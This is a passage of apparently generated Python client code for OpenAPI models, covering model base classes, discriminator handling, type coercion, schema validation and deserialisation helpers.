check_validations(
self.validations,
(name,),
value,
self._configuration
)
self.__dict__['_data_store'][name] = value
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
def __setattr__(self, attr, value):
"""set the value of an attribute using dot notation: `instance.attr = val`"""
self[attr] = value
def __getattr__(self, attr):
"""get the value of an attribute using dot notation: `instance.attr`"""
return self.__getitem__(attr)
def __new__(cls, *args, **kwargs):
# this function uses the discriminator to
# pick a new schema/class to instantiate because a discriminator
# propertyName value was passed in
if len(args) == 1:
arg = args[0]
if arg is None and is_type_nullable(cls):
# The input data is the 'null' value and the type is nullable.
return None
if issubclass(cls, ModelComposed) and allows_single_value_input(cls):
model_kwargs = {}
oneof_instance = get_oneof_instance(cls, model_kwargs, kwargs, model_arg=arg)
return oneof_instance
visited_composed_classes = kwargs.get('_visited_composed_classes', ())
if (
cls.discriminator is None or
cls in visited_composed_classes
):
# Use case 1: this openapi schema (cls) does not have a discriminator
# Use case 2: we have already visited this class before and are sure that we
# want to instantiate it this time. We have visited this class deserializing
# a payload with a discriminator. During that process we traveled through
# this class but did not make an instance of it. Now we are making an
# instance of a composed class which contains cls in it, so this time make an instance of cls.
#
# Here's an example of use case 2: If Animal has a discriminator
# petType and we pass in "Dog", and the class Dog
# allOf includes Animal, we move through Animal
# once using the discriminator, and pick Dog.
# Then in the composed schema dog Dog, we will make an instance of the
# Animal class (because Dal has allOf: Animal) but this time we won't travel
# through Animal's discriminator because we passed in
# _visited_composed_classes = (Animal,)
return super(OpenApiModel, cls).__new__(cls)
# Get the name and value of the discriminator property.
# The discriminator name is obtained from the discriminator meta-data
# and the discriminator value is obtained from the input data.
discr_propertyname_py = list(cls.discriminator.keys())[0]
discr_propertyname_js = cls.attribute_map[discr_propertyname_py]
if discr_propertyname_js in kwargs:
discr_value = kwargs[discr_propertyname_js]
elif discr_propertyname_py in kwargs:
discr_value = kwargs[discr_propertyname_py]
else:
# The input data does not contain the discriminator property.
path_to_item = kwargs.get('_path_to_item', ())
raise ApiValueError(
"Cannot deserialize input data due to missing discriminator. "
"The discriminator property '%s' is missing at path: %s" %
(discr_propertyname_js, path_to_item)
)
# Implementation note: the last argument to get_discriminator_class
# is a list of visited classes. get_discriminator_class may recursively
# call itself and update the list of visited classes, and the initial
# value must be an empty list. Hence not using 'visited_composed_classes'
new_cls = get_discriminator_class(
cls, discr_propertyname_py, discr_value, [])
if new_cls is None:
path_to_item = kwargs.get('_path_to_item', ())
disc_prop_value = kwargs.get(
discr_propertyname_js, kwargs.get(discr_propertyname_py))
raise ApiValueError(
"Cannot deserialize input data due to invalid discriminator "
"value. The OpenAPI document has no mapping for discriminator "
"property '%s'='%s' at path: %s" %
(discr_propertyname_js, disc_prop_value, path_to_item)
)
if new_cls in visited_composed_classes:
# if we are making an instance of a composed schema Descendent
# which allOf includes Ancestor, then Ancestor contains
# a discriminator that includes Descendent.
# So if we make an instance of Descendent, we have to make an
# instance of Ancestor to hold the allOf properties.
# This code detects that use case and makes the instance of Ancestor
# For example:
# When making an instance of Dog, _visited_composed_classes = (Dog,)
# then we make an instance of Animal to include in dog._composed_instances
# so when we are here, cls is Animal
# cls.discriminator != None
# cls not in _visited_composed_classes
# new_cls = Dog
# but we know we know that we already have Dog
# because it is in visited_composed_classes
# so make Animal here
return super(OpenApiModel, cls).__new__(cls)
# Build a list containing all oneOf and anyOf descendants.
oneof_anyof_classes = None
if cls._composed_schemas is not None:
oneof_anyof_classes = (
cls._composed_schemas.get('oneOf', ()) +
cls._composed_schemas.get('anyOf', ()))
oneof_anyof_child = new_cls in oneof_anyof_classes
kwargs['_visited_composed_classes'] = visited_composed_classes + (cls,)
if cls._composed_schemas.get('allOf') and oneof_anyof_child:
# Validate that we can make self because when we make the
# new_cls it will not include the allOf validations in self
self_inst = super(OpenApiModel, cls).__new__(cls)
self_inst.__init__(*args, **kwargs)
new_inst = new_cls.__new__(new_cls, *args, **kwargs)
new_inst.__init__(*args, **kwargs)
return new_inst
class ModelSimple(OpenApiModel):
"""the parent class of models whose type != object in their
swagger/openapi"""
def __setitem__(self, name, value):
"""set the value of an attribute using square-bracket notation: `instance[attr] = val`"""
if name in self.required_properties:
self.__dict__[name] = value
return
self.set_attribute(name, value)
def get(self, name, default=None):
"""returns the value of an attribute or some default value if the attribute was not set"""
if name in self.required_properties:
return self.__dict__[name]
return self.__dict__['_data_store'].get(name, default)
def __getitem__(self, name):
"""get the value of an attribute using square-bracket notation: `instance[attr]`"""
if name in self:
return self.get(name)
raise ApiAttributeError(
"{0} has no attribute '{1}'".format(
type(self).__name__, name),
[e for e in [self._path_to_item, name] if e]
)
def __contains__(self, name):
"""used by `in` operator to check if an attrbute value was set in an instance: `'attr' in instance`"""
if name in self.required_properties:
return name in self.__dict__
return name in self.__dict__['_data_store']
def to_str(self):
"""Returns the string representation of the model"""
return str(self.value)
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, self.__class__):
return False
this_val = self._data_store['value']
that_val = other._data_store['value']
types = set()
types.add(this_val.__class__)
types.add(that_val.__class__)
vals_equal = this_val == that_val
return vals_equal
class ModelNormal(OpenApiModel):
"""the parent class of models whose type == object in their
swagger/openapi"""
def __setitem__(self, name, value):
"""set the value of an attribute using square-bracket notation: `instance[attr] = val`"""
if name in self.required_properties:
self.__dict__[name] = value
return
self.set_attribute(name, value)
def get(self, name, default=None):
"""returns the value of an attribute or some default value if the attribute was not set"""
if name in self.required_properties:
return self.__dict__[name]
return self.__dict__['_data_store'].get(name, default)
def __getitem__(self, name):
"""get the value of an attribute using square-bracket notation: `instance[attr]`"""
if name in self:
return self.get(name)
raise ApiAttributeError(
"{0} has no attribute '{1}'".format(
type(self).__name__, name),
[e for e in [self._path_to_item, name] if e]
)
def __contains__(self, name):
"""used by `in` operator to check if an attrbute value was set in an instance: `'attr' in instance`"""
if name in self.required_properties:
return name in self.__dict__
return name in self.__dict__['_data_store']
def to_dict(self):
"""Returns the model properties as a dict"""
return model_to_dict(self, serialize=False)
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, self.__class__):
return False
if not set(self._data_store.keys()) == set(other._data_store.keys()):
return False
for _var_name, this_val in self._data_store.items():
that_val = other._data_store[_var_name]
types = set()
types.add(this_val.__class__)
types.add(that_val.__class__)
vals_equal = this_val == that_val
if not vals_equal:
return False
return True
class ModelComposed(OpenApiModel):
"""the parent class of models whose type == object in their
swagger/openapi and have oneOf/allOf/anyOf
When one sets a property we use var_name_to_model_instances to store the value in
the correct class instances + run any type checking + validation code.
When one gets a property we use var_name_to_model_instances to get the value
from the correct class instances.
This allows multiple composed schemas to contain the same property with additive
constraints on the value.
_composed_schemas (dict) stores the anyOf/allOf/oneOf classes
key (str): allOf/oneOf/anyOf
value (list): the classes in the XOf definition.
Note: none_type can be included when the openapi document version >= 3.1.0
_composed_instances (list): stores a list of instances of the composed schemas
defined in _composed_schemas. When properties are accessed in the self instance,
they are returned from the self._data_store or the data stores in the instances
in self._composed_schemas
_var_name_to_model_instances (dict): maps between a variable name on self and
the composed instances (self included) which contain that data
key (str): property name
value (list): list of class instances, self or instances in _composed_instances
which contain the value that the key is referring to.
"""
def __setitem__(self, name, value):
"""set the value of an attribute using square-bracket notation: `instance[attr] = val`"""
if name in self.required_properties:
self.__dict__[name] = value
return
# set the attribute on the correct instance
model_instances = self._var_name_to_model_instances.get(
name, self._additional_properties_model_instances)
if model_instances:
for model_instance in model_instances:
if model_instance == self:
self.set_attribute(name, value)
else:
setattr(model_instance, name, value)
if name not in self._var_name_to_model_instances:
# we assigned an additional property
self.__dict__['_var_name_to_model_instances'][name] = (
model_instance
)
return None
raise ApiAttributeError(
"{0} has no attribute '{1}'".format(
type(self).__name__, name),
[e for e in [self._path_to_item, name] if e]
)
__unset_attribute_value__ = object()
def get(self, name, default=None):
"""returns the value of an attribute or some default value if the attribute was not set"""
if name in self.required_properties:
return self.__dict__[name]
# get the attribute from the correct instance
model_instances = self._var_name_to_model_instances.get(
name, self._additional_properties_model_instances)
values = []
# A composed model stores child (oneof/anyOf/allOf) models under
# self._var_name_to_model_instances. A named property can exist in
# multiple child models. If the property is present in more than one
# child model, the value must be the same across all the child models.
if model_instances:
for model_instance in model_instances:
if name in model_instance._data_store:
v = model_instance._data_store[name]
if v not in values:
values.append(v)
len_values = len(values)
if len_values == 0:
return default
elif len_values == 1:
return values[0]
elif len_values > 1:
raise ApiValueError(
"Values stored for property {0} in {1} differ when looking "
"at self and self's composed instances. All values must be "
"the same".format(name, type(self).__name__),
[e for e in [self._path_to_item, name] if e]
)
def __getitem__(self, name):
"""get the value of an attribute using square-bracket notation: `instance[attr]`"""
value = self.get(name, self.__unset_attribute_value__)
if value is self.__unset_attribute_value__:
raise ApiAttributeError(
"{0} has no attribute '{1}'".format(
type(self).__name__, name),
[e for e in [self._path_to_item, name] if e]
)
return value
def __contains__(self, name):
"""used by `in` operator to check if an attrbute value was set in an instance: `'attr' in instance`"""
if name in self.required_properties:
return name in self.__dict__
model_instances = self._var_name_to_model_instances.get(
name, self._additional_properties_model_instances)
if model_instances:
for model_instance in model_instances:
if name in model_instance._data_store:
return True
return False
def to_dict(self):
"""Returns the model properties as a dict"""
return model_to_dict(self, serialize=False)
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, self.__class__):
return False
if not set(self._data_store.keys()) == set(other._data_store.keys()):
return False
for _var_name, this_val in self._data_store.items():
that_val = other._data_store[_var_name]
types = set()
types.add(this_val.__class__)
types.add(that_val.__class__)
vals_equal = this_val == that_val
if not vals_equal:
return False
return True
COERCION_INDEX_BY_TYPE = {
ModelComposed: 0,
ModelNormal: 1,
ModelSimple: 2,
none_type: 3, # The type of 'None'.
list: 4,
dict: 5,
float: 6,
int: 7,
bool: 8,
datetime: 9,
date: 10,
str: 11,
file_type: 12, # 'file_type' is an alias for the built-in 'file' or 'io.IOBase' type.
}
# these are used to limit what type conversions we try to do
# when we have a valid type already and we want to try converting
# to another type
UPCONVERSION_TYPE_PAIRS = (
(str, datetime),
(str, date),
(int, float), # A float may be serialized as an integer, e.g. '3' is a valid serialized float.
(list, ModelComposed),
(dict, ModelComposed),
(str, ModelComposed),
(int, ModelComposed),
(float, ModelComposed),
(list, ModelComposed),
(list, ModelNormal),
(dict, ModelNormal),
(str, ModelSimple),
(int, ModelSimple),
(float, ModelSimple),
(list, ModelSimple),
)
COERCIBLE_TYPE_PAIRS = {
False: ( # client instantiation of a model with client data
# (dict, ModelComposed),
# (list, ModelComposed),
# (dict, ModelNormal),
# (list, ModelNormal),
# (str, ModelSimple),
# (int, ModelSimple),
# (float, ModelSimple),
# (list, ModelSimple),
# (str, int),
# (str, float),
# (str, datetime),
# (str, date),
# (int, str),
# (float, str),
),
True: ( # server -> client data
(dict, ModelComposed),
(list, ModelComposed),
(dict, ModelNormal),
(list, ModelNormal),
(str, ModelSimple),
(int, ModelSimple),
(float, ModelSimple),
(list, ModelSimple),
# (str, int),
# (str, float),
(str, datetime),
(str, date),
# (int, str),
# (float, str),
(str, file_type)
),
}
def get_simple_class(input_value):
"""Returns an input_value's simple class that we will use for type checking
Python2:
float and int will return int, where int is the python3 int backport
str and unicode will return str, where str is the python3 str backport
Note: float and int ARE both instances of int backport
Note: str_py2 and unicode_py2 are NOT both instances of str backport
Args:
input_value (class/class_instance): the item for which we will return
the simple class
"""
if isinstance(input_value, type):
# input_value is a class
return input_value
elif isinstance(input_value, tuple):
return tuple
elif isinstance(input_value, list):
return list
elif isinstance(input_value, dict):
return dict
elif isinstance(input_value, none_type):
return none_type
elif isinstance(input_value, file_type):
return file_type
elif isinstance(input_value, bool):
# this must be higher than the int check because
# isinstance(True, int) == True
return bool
elif isinstance(input_value, int):
return int
elif isinstance(input_value, datetime):
# this must be higher than the date check because
# isinstance(datetime_instance, date) == True
return datetime
elif isinstance(input_value, date):
return date
elif isinstance(input_value, str):
return str
return type(input_value)
def check_allowed_values(allowed_values, input_variable_path, input_values):
"""Raises an exception if the input_values are not allowed
Args:
allowed_values (dict): the allowed_values dict
input_variable_path (tuple): the path to the input variable
input_values (list/str/int/float/date/datetime): the values that we
are checking to see if they are in allowed_values
"""
these_allowed_values = list(allowed_values[input_variable_path].values())
if (isinstance(input_values, list)
and not set(input_values).issubset(
set(these_allowed_values))):
invalid_values = ", ".join(
map(str, set(input_values) - set(these_allowed_values))),
raise ApiValueError(
"Invalid values for `%s` [%s], must be a subset of [%s]" %
(
input_variable_path[0],
invalid_values,
", ".join(map(str, these_allowed_values))
)
)
elif (isinstance(input_values, dict)
and not set(
input_values.keys()).issubset(set(these_allowed_values))):
invalid_values = ", ".join(
map(str, set(input_values.keys()) - set(these_allowed_values)))
raise ApiValueError(
"Invalid keys in `%s` [%s], must be a subset of [%s]" %
(
input_variable_path[0],
invalid_values,
", ".join(map(str, these_allowed_values))
)
)
elif (not isinstance(input_values, (list, dict))
and input_values not in these_allowed_values):
raise ApiValueError(
"Invalid value for `%s` (%s), must be one of %s" %
(
input_variable_path[0],
input_values,
these_allowed_values
)
)
def is_json_validation_enabled(schema_keyword, configuration=None):
"""Returns true if JSON schema validation is enabled for the specified
validation keyword. This can be used to skip JSON schema structural validation
as requested in the configuration.
Args:
schema_keyword (string): the name of a JSON schema validation keyword.
configuration (Configuration): the configuration class.
"""
return (configuration is None or
not hasattr(configuration, '_disabled_client_side_validations') or
schema_keyword not in configuration._disabled_client_side_validations)
def check_validations(
validations, input_variable_path, input_values,
configuration=None):
"""Raises an exception if the input_values are invalid
Args:
validations (dict): the validation dictionary.
input_variable_path (tuple): the path to the input variable.
input_values (list/str/int/float/date/datetime): the values that we
are checking.
configuration (Configuration): the configuration class.
"""
if input_values is None:
return
current_validations = validations[input_variable_path]
if (is_json_validation_enabled('multipleOf', configuration) and
'multiple_of' in current_validations and
isinstance(input_values, (int, float)) and
not (float(input_values) / current_validations['multiple_of']).is_integer()):
# Note 'multipleOf' will be as good as the floating point arithmetic.
raise ApiValueError(
"Invalid value for `%s`, value must be a multiple of "
"`%s`" % (
input_variable_path[0],
current_validations['multiple_of']
)
)
if (is_json_validation_enabled('maxLength', configuration) and
'max_length' in current_validations and
len(input_values) > current_validations['max_length']):
raise ApiValueError(
"Invalid value for `%s`, length must be less than or equal to "
"`%s`" % (
input_variable_path[0],
current_validations['max_length']
)
)
if (is_json_validation_enabled('minLength', configuration) and
'min_length' in current_validations and
len(input_values) < current_validations['min_length']):
raise ApiValueError(
"Invalid value for `%s`, length must be greater than or equal to "
"`%s`" % (
input_variable_path[0],
current_validations['min_length']
)
)
if (is_json_validation_enabled('maxItems', configuration) and
'max_items' in current_validations and
len(input_values) > current_validations['max_items']):
raise ApiValueError(
"Invalid value for `%s`, number of items must be less than or "
"equal to `%s`" % (
input_variable_path[0],
current_validations['max_items']
)
)
if (is_json_validation_enabled('minItems', configuration) and
'min_items' in current_validations and
len(input_values) < current_validations['min_items']):
raise ValueError(
"Invalid value for `%s`, number of items must be greater than or "
"equal to `%s`" % (
input_variable_path[0],
current_validations['min_items']
)
)
items = ('exclusive_maximum', 'inclusive_maximum', 'exclusive_minimum',
'inclusive_minimum')
if (any(item in current_validations for item in items)):
if isinstance(input_values, list):
max_val = max(input_values)
min_val = min(input_values)
elif isinstance(input_values, dict):
max_val = max(input_values.values())
min_val = min(input_values.values())
else:
max_val = input_values
min_val = input_values
if (is_json_validation_enabled('exclusiveMaximum', configuration) and
'exclusive_maximum' in current_validations and
max_val >= current_validations['exclusive_maximum']):
raise ApiValueError(
"Invalid value for `%s`, must be a value less than `%s`" % (
input_variable_path[0],
current_validations['exclusive_maximum']
)
)
if (is_json_validation_enabled('maximum', configuration) and
'inclusive_maximum' in current_validations and
max_val > current_validations['inclusive_maximum']):
raise ApiValueError(
"Invalid value for `%s`, must be a value less than or equal to "
"`%s`" % (
input_variable_path[0],
current_validations['inclusive_maximum']
)
)
if (is_json_validation_enabled('exclusiveMinimum', configuration) and
'exclusive_minimum' in current_validations and
min_val <= current_validations['exclusive_minimum']):
raise ApiValueError(
"Invalid value for `%s`, must be a value greater than `%s`" %
(
input_variable_path[0],
current_validations['exclusive_maximum']
)
)
if (is_json_validation_enabled('minimum', configuration) and
'inclusive_minimum' in current_validations and
min_val < current_validations['inclusive_minimum']):
raise ApiValueError(
"Invalid value for `%s`, must be a value greater than or equal "
"to `%s`" % (
input_variable_path[0],
current_validations['inclusive_minimum']
)
)
flags = current_validations.get('regex', {}).get('flags', 0)
if (is_json_validation_enabled('pattern', configuration) and
'regex' in current_validations and
not re.search(current_validations['regex']['pattern'],
input_values, flags=flags)):
err_msg = r"Invalid value for `%s`, must match regular expression `%s`" % (
input_variable_path[0],
current_validations['regex']['pattern']
)
if flags != 0:
# Don't print the regex flags if the flags are not
# specified in the OAS document.
err_msg = r"%s with flags=`%s`" % (err_msg, flags)
raise ApiValueError(err_msg)
def order_response_types(required_types):
"""Returns the required types sorted in coercion order
Args:
required_types (list/tuple): collection of classes or instance of
list or dict with class information inside it.
Returns:
(list): coercion order sorted collection of classes or instance
of list or dict with class information inside it.
"""
def index_getter(class_or_instance):
if isinstance(class_or_instance, list):
return COERCION_INDEX_BY_TYPE[list]
elif isinstance(class_or_instance, dict):
return COERCION_INDEX_BY_TYPE[dict]
elif (inspect.isclass(class_or_instance)
and issubclass(class_or_instance, ModelComposed)):
return COERCION_INDEX_BY_TYPE[ModelComposed]
elif (inspect.isclass(class_or_instance)
and issubclass(class_or_instance, ModelNormal)):
return COERCION_INDEX_BY_TYPE[ModelNormal]
elif (inspect.isclass(class_or_instance)
and issubclass(class_or_instance, ModelSimple)):
return COERCION_INDEX_BY_TYPE[ModelSimple]
elif class_or_instance in COERCION_INDEX_BY_TYPE:
return COERCION_INDEX_BY_TYPE[class_or_instance]
raise ApiValueError("Unsupported type: %s" % class_or_instance)
sorted_types = sorted(
required_types,
key=lambda class_or_instance: index_getter(class_or_instance)
)
return sorted_types
def remove_uncoercible(required_types_classes, current_item, spec_property_naming,
must_convert=True):
"""Only keeps the type conversions that are possible
Args:
required_types_classes (tuple): tuple of classes that are required
these should be ordered by COERCION_INDEX_BY_TYPE
spec_property_naming (bool): True if the variable names in the input
data are serialized names as specified in the OpenAPI document.
False if the variables names in the input data are python
variable names in PEP-8 snake case.
current_item (any): the current item (input data) to be converted
Keyword Args:
must_convert (bool): if True the item to convert is of the wrong
type and we want a big list of coercibles
if False, we want a limited list of coercibles
Returns:
(list): the remaining coercible required types, classes only
"""
current_type_simple = get_simple_class(current_item)
results_classes = []
for required_type_class in required_types_classes:
# convert our models to OpenApiModel
required_type_class_simplified = required_type_class
if isinstance(required_type_class_simplified, type):
if issubclass(required_type_class_simplified, ModelComposed):
required_type_class_simplified = ModelComposed
elif issubclass(required_type_class_simplified, ModelNormal):
required_type_class_simplified = ModelNormal
elif issubclass(required_type_class_simplified, ModelSimple):
required_type_class_simplified = ModelSimple
if required_type_class_simplified == current_type_simple:
# don't consider converting to one's own class
continue
class_pair = (current_type_simple, required_type_class_simplified)
if must_convert and class_pair in COERCIBLE_TYPE_PAIRS[spec_property_naming]:
results_classes.append(required_type_class)
elif class_pair in UPCONVERSION_TYPE_PAIRS:
results_classes.append(required_type_class)
return results_classes
def get_discriminated_classes(cls):
"""
Returns all the classes that a discriminator converts to
TODO: lru_cache this
"""
possible_classes = []
key = list(cls.discriminator.keys())[0]
if is_type_nullable(cls):
possible_classes.append(cls)
for discr_cls in cls.discriminator[key].values():
if hasattr(discr_cls, 'discriminator') and discr_cls.discriminator is not None:
possible_classes.extend(get_discriminated_classes(discr_cls))
else:
possible_classes.append(discr_cls)
return possible_classes
def get_possible_classes(cls, from_server_context):
# TODO: lru_cache this
possible_classes = [cls]
if from_server_context:
return possible_classes
if hasattr(cls, 'discriminator') and cls.discriminator is not None:
possible_classes = []
possible_classes.extend(get_discriminated_classes(cls))
elif issubclass(cls, ModelComposed):
possible_classes.extend(composed_model_input_classes(cls))
return possible_classes
def get_required_type_classes(required_types_mixed, spec_property_naming):
"""Converts the tuple required_types into a tuple and a dict described
below
Args:
required_types_mixed (tuple/list): will contain either classes or
instance of list or dict
spec_property_naming (bool): if True these values came from the
server, and we use the data types in our endpoints.
If False, we are client side and we need to include
oneOf and discriminator classes inside the data types in our endpoints
Returns:
(valid_classes, dict_valid_class_to_child_types_mixed):
valid_classes (tuple): the valid classes that the current item
should be
dict_valid_class_to_child_types_mixed (dict):
valid_class (class): this is the key
child_types_mixed (list/dict/tuple): describes the valid child
types
"""
valid_classes = []
child_req_types_by_current_type = {}
for required_type in required_types_mixed:
if isinstance(required_type, list):
valid_classes.append(list)
child_req_types_by_current_type[list] = required_type
elif isinstance(required_type, tuple):
valid_classes.append(tuple)
child_req_types_by_current_type[tuple] = required_type
elif isinstance(required_type, dict):
valid_classes.append(dict)
child_req_types_by_current_type[dict] = required_type[str]
else:
valid_classes.extend(get_possible_classes(required_type, spec_property_naming))
return tuple(valid_classes), child_req_types_by_current_type
def change_keys_js_to_python(input_dict, model_class):
"""
Converts from javascript_key keys in the input_dict to python_keys in
the output dict using the mapping in model_class.
If the input_dict contains a key which does not declared in the model_class,
the key is added to the output dict as is. The assumption is the model_class
may have undeclared properties (additionalProperties attribute in the OAS
document).
"""
if getattr(model_class, 'attribute_map', None) is None:
return input_dict
output_dict = {}
reversed_attr_map = {value: key for key, value in
model_class.attribute_map.items()}
for javascript_key, value in input_dict.items():
python_key = reversed_attr_map.get(javascript_key)
if python_key is None:
# if the key is unknown, it is in error or it is an
# additionalProperties variable
python_key = javascript_key
output_dict[python_key] = value
return output_dict
def get_type_error(var_value, path_to_item, valid_classes, key_type=False):
error_msg = type_error_message(
var_name=path_to_item[-1],
var_value=var_value,
valid_classes=valid_classes,
key_type=key_type
)
return ApiTypeError(
error_msg,
path_to_item=path_to_item,
valid_classes=valid_classes,
key_type=key_type
)
def deserialize_primitive(data, klass, path_to_item):
"""Deserializes string to primitive type.
:param data: str/int/float
:param klass: str/class the class to convert to
:return: int, float, str, bool, date, datetime
"""
additional_message = ""
try:
if klass in {datetime, date}:
additional_message = (
"If you need your parameter to have a fallback "
"string value, please set its type as `type: {}` in your "
"spec. That allows the value to be any type. "
)
if klass == datetime:
if len(data) < 8:
raise ValueError("This is not a datetime")
# The string should be in iso8601 datetime format.
parsed_datetime = parse(data)
date_only = (
parsed_datetime.hour == 0 and
parsed_datetime.minute == 0 and
parsed_datetime.second == 0 and
parsed_datetime.tzinfo is None and
8 <= len(data) <= 10
)
if date_only:
raise ValueError("This is a date, not a datetime")
return parsed_datetime
elif klass == date:
if len(data) < 8:
raise ValueError("This is not a date")
return parse(data).date()
else:
converted_value = klass(data)
if isinstance(data, str) and klass == float:
if str(converted_value) != data:
# '7' -> 7.0 -> '7.0' != '7'
raise ValueError('This is not a float')
return converted_value
except (OverflowError, ValueError) as ex:
# parse can raise OverflowError
raise ApiValueError(
"{0}Failed to parse {1} as {2}".format(
additional_message, repr(data), klass.__name__
),
path_to_item=path_to_item
) from ex
def get_discriminator_class(model_class,
discr_name,
discr_value, cls_visited):
"""Returns the child class specified by the discriminator.
Args:
model_class (OpenApiModel): the model class.
discr_name (string): the name of the discriminator property.
discr_value (any): the discriminator value.
cls_visited (list): list of model classes that have been visited.
Used to determine the discriminator class without
visiting circular references indefinitely.
Returns:
used_model_class (class/None): the chosen child class that will be used
to deserialize the data, for example dog.Dog.
If a class is not found, None is returned.
"""
if model_class in cls_visited:
# The class has already been visited and no suitable class was found.
return None
cls_visited.append(model_class)
used_model_class = None
if discr_name in model_class.discriminator:
class_name_to_discr_class = model_class.discriminator[discr_name]
used_model_class = class_name_to_discr_class.get(discr_value)
if used_model_class is None:
# We didn't find a discriminated class in class_name_to_discr_class.
# So look in the ancestor or descendant discriminators
# The discriminator mapping may exist in a descendant (anyOf, oneOf)
# or ancestor (allOf).
# Ancestor example: in the GrandparentAnimal -> ParentPet -> ChildCat
# hierarchy, the discriminator mappings may be defined at any level
# in the hierarchy.
# Descendant example: mammal -> whale/zebra/Pig -> BasquePig/DanishPig
# if we try to make BasquePig from mammal, we need to travel through
# the oneOf descendant discriminators to find BasquePig
descendant_classes = model_class._composed_schemas.get('oneOf', ()) + \
model_class._composed_schemas.get('anyOf', ())
ancestor_classes = model_class._composed_schemas.get('allOf', ())
possible_classes = descendant_classes + ancestor_classes
for cls in possible_classes:
# Check if the schema has inherited discriminators.
if hasattr(cls, 'discriminator') and cls.discriminator is not None:
used_model_class = get_discriminator_class(
cls, discr_name, discr_value, cls_visited)
if used_model_class is not None:
return used_model_class
return used_model_class
def deserialize_model(model_data, model_class, path_to_item, check_type,
configuration, spec_property_naming):
"""Deserializes model_data to model instance.
Args:
model_data (int/str/float/bool/none_type/list/dict): data to instantiate the model
model_class (OpenApiModel): the model class
path_to_item (list): path to the model in the received data
check_type (bool): whether to check the data tupe for the values in
the model
configuration (Configuration): the instance to use to convert files
spec_property_naming (bool): True if the variable names in the input
data are serialized names as specified in the OpenAPI document.
False if the variables names in the input data are python
variable names in PEP-8 snake case.
Returns:
model instance
Raise:
ApiTypeError
ApiValueError
ApiKeyError
"""
kw_args = dict(_check_type=check_type,
_path_to_item=path_to_item,
_configuration=configuration,
_spec_property_naming=spec_property_naming)
if issubclass(model_class, ModelSimple):
return model_class(model_data, **kw_args)
elif isinstance(model_data, list):
return model_class(*model_data, **kw_args)
if isinstance(model_data, dict):
kw_args.update(model_data)
return model_class(**kw_args)
elif isinstance(model_data, PRIMITIVE_TYPES):
return model_class(model_data, **kw_args)
def deserialize_file(response_data, configuration, content_disposition=None):
"""Deserializes body to file
Saves response body into a file in a temporary folder,
using the filename from the `Content-Disposition` header if provided.
Args:
param response_data (str): the file data to write
configuration (Configuration): the instance to use to convert files
Keyword Args:
content_disposition (str): the value of the Content-Disposition
header
Returns:
(file_type): the deserialized file which is open
The user is responsible for closing and reading the file
"""
fd, path = tempfile.mkstemp(dir=configuration.temp_folder_path)
os.close(fd)
os.remove(path)
if content_disposition:
filename = re.search(r'filename=[\'"]?([^\'"\s]+)[\'"]?',
content_disposition).group(1)
path = os.path.join(os.path.dirname(path), filename)
with open(path, "wb") as f:
if isinstance(response_data, str):
# change str to bytes so we can write it
response_data = response_data.encode('utf-8')
f.write(response_data)
f = open(path, "rb")
return f
def attempt_convert_item(input_value, valid_classes, path_to_item,
configuration, spec_property_naming, key_type=False,
must_convert=False, check_type=True):
"""
Args:
input_value (any): the data to convert
valid_classes (any): the classes that are valid
path_to_item (list): the path to the item to convert
configuration (Configuration): the instance to use to convert files
spec_property_naming (bool): True if the variable names in the input
data are serialized names as specified in the OpenAPI document.
False if the variables names in the input data are python
variable names in PEP-8 snake case.
key_type (bool): if True we need to convert a key type (not supported)
must_convert (bool): if True we must convert
check_type (bool): if True we check the type or the returned data in
ModelComposed/ModelNormal/ModelSimple instances
Returns:
instance (any) the fixed item
Raises:
ApiTypeError
ApiValueError
ApiKeyError
"""
valid_classes_ordered = order_response_types(valid_classes)
valid_classes_coercible = remove_uncoercible(
valid_classes_ordered, input_value, spec_property_naming)
if not valid_classes_coercible or key_type:
# we do not handle keytype errors, json will take care
# of this for us
if configuration is None or not configuration.discard_unknown_keys:
raise get_type_error(input_value, path_to_item, valid_classes,
key_type=key_type)
for valid_class in valid_classes_coercible:
try:
if issubclass(valid_class, OpenApiModel):
return deserialize_model(input_value, valid_class,
path_to_item, check_type,
configuration, spec_property_naming)
elif valid_class == file_type:
return deserialize_file(input_value, configuration)
return deserialize_primitive(input_value, valid_class,
path_to_item)
except (ApiTypeError, ApiValueError, ApiKeyError) as conversion_exc:
if must_convert:
raise conversion_exc
# if we have conversion errors when must_convert == False
# we ignore the exception and move on to the next class
continue
# we were unable to convert, must_convert == False
return input_value
def is_type_nullable(input_type):
"""
Returns true if None is an allowed value for the specified input_type.
A type is nullable if at least one of the following conditions is true:
1. The OAS 'nullable' attribute has been specified,
1. The type is the 'null' type,
1. The type is a anyOf/oneOf composed schema, and a child schema is
the 'null' type.
Args:
input_type (type): the class of the input_value that we are
checking
Returns:
bool
"""
if input_type is none_type:
return True
if issubclass(input_type, OpenApiModel) and input_type._nullable:
return True
if issubclass(input_type, ModelComposed):
# If oneOf/anyOf, check if the 'null' type is one of the allowed types.
for t in input_type._composed_schemas.get('oneOf', ()):
if is_type_nullable(t): return True
for t in input_type._composed_schemas.get('anyOf', ()):
if is_type_nullable(t): return True
return False
def is_valid_type(input_class_simple, valid_classes):
"""
Args:
input_class_simple (class): the class of the input_value that we are
checking
valid_classes (tuple): the valid classes that the current item
should be
Returns:
bool
"""
valid_type = input_class_simple in valid_classes
if not valid_type and (
issubclass(input_class_simple, OpenApiModel) or
input_class_simple is none_type):
for valid_class in valid_classes:
if input_class_simple is none_type and is_type_nullable(valid_class):
# Schema is oneOf/anyOf and the 'null' type is one of the allowed types.
return True
if not (issubclass(valid_class, OpenApiModel) and valid_class.discriminator):
continue
discr_propertyname_py = list(valid_class.discriminator.keys())[0]
discriminator_classes = (
valid_class.discriminator[discr_propertyname_py].values()
)
valid_type = is_valid_type(input_class_simple, discriminator_classes)
if valid_type:
return True
return valid_type
def validate_and_convert_types(input_value, required_types_mixed, path_to_item,
spec_property_naming, _check_type, configuration=None):
"""Raises a TypeError is there is a problem, otherwise returns value
Args:
input_value (any): the data to validate/convert
required_types_mixed (list/dict/tuple): A list of
valid classes, or a list tuples of valid classes, or a dict where
the value is a tuple of value classes
path_to_item: (list) the path to the data being validated
this stores a list of keys or indices to get to the data being
validated
